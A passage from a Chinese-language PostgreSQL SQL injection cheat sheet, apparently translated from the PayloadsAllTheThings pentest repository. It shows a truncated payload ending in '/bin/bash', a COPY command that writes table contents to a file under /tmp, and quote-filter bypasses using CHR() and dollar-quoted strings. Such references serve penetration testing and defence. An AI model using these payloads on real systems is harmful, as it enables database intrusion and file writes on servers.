/bin/bash'); 174 | SELECT * FROM pentestlab; 175 | COPY pentestlab(t) TO '/tmp/pentestlab'; 176 | ``` 177 | 178 | ## 绕过过滤器 179 | 180 | 引号 181 | 182 | 使用 CHR 183 | 184 | ``` 185 | SELECT CHR(65)||CHR(66)||CHR(67); 186 | ``` 187 | 188 | 使用 $ 符号(适用于 PostgreSQL 8及以上版本) 189 | 190 | ``` 191 | SELECT $$This is a string$$ 192 | SELECT $TAG$This is another string$TAG$ 193 | ``` 194 | 195 | > 注:大部分内容翻译至:[https://github.com/swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) --------------------------------------------------------------------------------